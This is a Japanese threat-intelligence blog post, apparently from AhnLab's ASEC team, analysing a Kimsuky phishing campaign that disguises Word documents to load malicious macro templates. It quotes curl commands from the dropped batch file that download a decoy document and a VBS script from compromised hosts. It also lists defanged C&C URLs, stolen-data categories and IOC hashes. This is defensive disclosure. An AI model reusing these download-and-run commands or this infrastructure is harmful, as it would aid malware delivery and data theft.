Posted By ,

正常なドキュメントに偽装したマルウェア(Kimsuky)

ASEC 分析チームは最近<原稿委託書に偽装したマルウェア(安保分野従事者が対象)>で紹介したマルウェアが安保分野だけでなく、マスコミや一般企業をターゲットに拡散していることを確認した。この不正なファイルはすべて上記のブログで紹介したマルウェアと同じようにテンプレートインジェクション(Template Injection)技法を使用しており、不正な Word マクロドキュメントをダウンロードして実行する。確認された配布ファイル名は以下の通りである。

  • [kbs 日曜診断]質問用紙.docx
  • イム** 自己紹介書.docx
  • app-planning – copy.docx
\word\_rels\settings.xml.rels で確認される External URL

攻撃者は不正なマクロコードが実行されるようにマクロの実行を誘導する画像を使用していた。この画像は以前から使用され続けており、すべて同じ攻撃者であると推定される。

攻撃者のメールに返信した場合に外部リンクで提供される Word ドキュメント (Kimsuky)

マクロの実行を誘導する画像

追加で確認された不正な Word マクロドキュメントのダウンロード URL は以下の通りである。

  • hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload2/init.dotm
  • hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/init.dotm
  • hxxp://jooshineng[.]com/gnuboard4/adm/img/ghp/up/state.dotm
  • hxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm
  • hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/init.dotm

ダウンロードしたドキュメントファイルに含まれた不正なマクロが実行されると、curl コマンドが含まれた version.bat ファイルを生成および実行する。バッチファイルには正常なドキュメントと追加で不正なスクリプトをダウンロードおよび実行するコードが存在する。使用される curl コマンドは以下の通りである。

  • curl -o “”” & fname & “”” hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/state.docx
  • curl -o %temp%\temp.vbs hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60

確認された正常なドキュメントは、以下のような自己紹介書、アプリ提案書などに偽装していた。

正常なドキュメント-1
正常なドキュメント-2
正常なドキュメント-3

追加の不正なスクリプトの場合、従来と同じように以下の情報を C&C サーバーに流出させる。

  • 感染 PC のシステム情報
  • システムにインストールされたアンチウイルス情報
  • 最近開いた Word ドキュメントリスト
  • システム内ダウンロードフォルダーパス情報
  • 実行中のプロセス情報
  • IE 関連レジストリキーの修正
  • C&C サーバー接続維持のためのタスクスケジューラ登録

確認された C&C サーバーは以下の通りである。

  • hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/show.php
  • hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/show.php
  • hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/show.php

最近、対北朝鮮関連の人物を対象にしたマルウェアが、一般企業ユーザーも対象にして拡散しているため、ユーザーは特に注意する必要がある。送信者の分からないメールの添付ファイルの閲覧は避け、Office ドキュメントを含むマクロが自動で実行されないように注意しなければならない。

[ファイル検知]

  • Downloader/DOC.External (2023.02.03.03)
  • Downloader/DOC.Kimsuky (2023.02.07.00)

[IOC]

  • 55a46a2415d18093abcd59a0bf33d0a9 (docx)
  • 3cdf9f829ed03e1ac17b72b636d84d0bs (dotm)
  • 873b2b0656ee9f6912390b5abc32b276 (dotm)
  • 83b4d96fc75f74bb589c28e8a9eddbbf (dotm)
  • 705ef00224f3f7b02e29f21eb6e10d02 (dotm)
  • hxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm
  • hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/init.dotm
  • hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload2/init.dotm
  • hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/init.dotm
  • hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

Categories:マルウェアの情報

Tagged as:,,

5 1 vote
評価する
guest

0 コメント
Inline Feedbacks
View all comments